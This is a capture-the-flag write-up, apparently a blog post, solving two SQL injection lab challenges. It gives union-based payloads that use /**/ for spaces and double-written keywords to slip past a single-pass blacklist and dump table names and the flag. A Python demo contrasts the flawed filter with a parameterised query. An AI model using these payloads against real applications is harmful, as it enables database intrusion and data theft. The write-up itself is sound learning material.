shiyanbar CTF: Simple SQL Injection 1 and Simple SQL Injection 2

Date: 2020-3-11

Continuing from the blog post referenced above.

Simple SQL Injection 1

Challenge link: http://ctf5.shiyanbar.com/423/web/

As before, enter 1' directly: an error is returned below the result, so the parameter is presumably closed by a single quote, a string (character-type) injection. What this challenge actually filters is unknown at this point, so let's just start trying.

Input 1' and 1=1. Normally this should return the normal result, but it returns an error.

Something is being filtered. Try another form: input 1' and '1'='1

Still an error. What is going on? Swap and for or and try 1' or '1'='1

All the data comes back, but and does not work, so and is presumably filtered. To confirm, double-write and in 1' and '1'='1

With two and in the input, only one and shows up in the echoed result. So and is definitely filtered, and the space after it is stripped as well.

Fine. Use /**/ in place of spaces to get past the filter, and go with a union query:

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

Honestly, I don't know why database() doesn't work here. Advice welcome.

Next, enumerate the table names:

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

The table name is flag.

Next, enumerate the column names:

1'/**/union/**/select/**/column_name/**/from/**/information_schema.coluinformation_schema.columnsmns/**/where/**/table_name='flag

But this does not work.

information_schema.columns is being filtered. Double-writing is the tool here, but I found that a plain double write gets filtered too, so I put the second copy in the middle of the string:

1'/**/union/**/select/**/column_name/**/from/**/information_schema.coluinformation_schema.columnsmns/**/where/**/table_name='flag

The result is still an error, so perhaps column_name is filtered too. Double-write the column name as well:

1'/**/union/**/select/**/column_nacolumn_nameme/**/from/**/information_schema.coluinformation_schema.columnsmns/**/where/**/table_name='flag

The column name flag appears.

Next, go straight for the flag: 1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

Get the flag.
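As an added illustration (not code from this write-up or from the challenge itself), the Python script below models the single-pass blacklist the write-up infers and runs it against an in-memory SQLite table with constructed sample data and an assumed schema. It shows why a double-written keyword survives the filter and why binding the value with a parameterised query removes the problem without any blacklist.

```python
import sqlite3

# Stand-in for the challenge's blacklist (assumption: the real filter is not
# published; this mirrors the behaviour observed in the write-up: each term is
# deleted in a single pass and the result is concatenated into the query).
BLACKLIST = [" ", "and", "information_schema.columns", "column_name"]


def naive_filter(value):
    """Single-pass removal: 'anandd' -> 'and', 'column_nacolumn_nameme' -> 'column_name'."""
    for term in BLACKLIST:
        value = value.replace(term, "")  # text formed by the deletion is never re-scanned
    return value


def make_db():
    """Constructed sample schema: a news table the page queries and a flag table beside it."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        "CREATE TABLE news(id INTEGER, title TEXT);"
        "INSERT INTO news VALUES (1, 'hello'), (2, 'world');"
        "CREATE TABLE flag(flag TEXT);"
        "INSERT INTO flag VALUES ('flag{constructed-sample-value}');"
    )
    return con


def vulnerable_lookup(user_input):
    """Filter, then concatenate: /**/ stands in for the stripped spaces, so the
    union in the write-up's payload is parsed as SQL and the flag row leaks."""
    con = make_db()
    sql = "SELECT title FROM news WHERE id='" + naive_filter(user_input) + "'"
    return [row[0] for row in con.execute(sql)]


def safe_lookup(user_input):
    """Parameterised query: the input is bound as a value and never parsed as SQL."""
    con = make_db()
    rows = con.execute("SELECT title FROM news WHERE id=?", (user_input,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    payload = "1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1"
    print("filter sees :", naive_filter("1' and 1=1"))        # spaces and 'and' gone: syntax error
    print("vulnerable  :", vulnerable_lookup(payload))        # flag row appears
    print("parameterised:", safe_lookup(payload))             # no match, nothing leaks
```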

For the second challenge, the database name and the table name can be obtained with the same first two statements, but the third statement, which enumerates the column name, needs no double-writing:

1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='flag

The table name and the column name come out the same way; they are again flag and flag.

1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

That gives the answer.

I haven't worked out Simple SQL Injection 3 yet; I haven't learned fuzzing yet. This will be updated in a couple of days once I have learned it.